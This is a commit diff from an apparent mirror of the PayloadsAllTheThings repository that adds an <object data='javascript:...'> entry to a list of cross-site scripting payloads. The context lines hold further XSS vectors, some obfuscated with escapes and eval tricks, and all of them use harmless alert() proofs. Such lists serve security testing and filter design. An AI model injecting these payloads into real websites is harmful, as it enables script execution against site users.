mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 15:49:38 -08:00
Added XSS <object> payload
This commit is contained in:
@@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
|
|||||||
<script>\u0061lert('22')</script>
|
<script>\u0061lert('22')</script>
|
||||||
<script>eval('\x61lert(\'33\')')</script>
|
<script>eval('\x61lert(\'33\')')</script>
|
||||||
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
|
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
|
||||||
|
<object/data="javascript:alert(23)">
|
||||||
|
|
||||||
// Img payload
|
// Img payload
|
||||||
<img src=x onerror=alert('XSS');>
|
<img src=x onerror=alert('XSS');>
|
||||||
|
|||||||
Reference in New Issue
Block a user